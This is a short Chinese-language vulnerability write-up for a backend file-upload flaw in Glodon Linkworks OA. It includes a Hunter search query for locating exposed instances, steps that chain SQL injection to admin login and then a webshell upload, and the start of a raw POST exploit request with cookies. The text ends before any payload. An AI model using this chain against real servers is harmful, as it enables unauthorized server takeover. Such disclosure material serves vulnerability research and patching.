一、漏洞简介
广联达Linkworks办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。msgbroadcastuploadfile.aspx接口处存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登陆发送请求包获取服务器权限。
二、影响版本
- 广联达办公OA
三、资产测绘
- hunter
app.name="广联达 OA"
- 登录页面
四、漏洞复现
- 通过SQL注入漏洞获取管理员信息登录后台
- 通过上一步获取的cookie替换通过poc上传文件获取shell
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Cookie: 0_styleName=styleA; ASP.NET_SessionId=iujpmeeoodatd3valrfzlybx; GTP_IdServer_LangID=2052; .ASPXAUTH=C07DD2AB8669EC488CEC31D5290CD2329A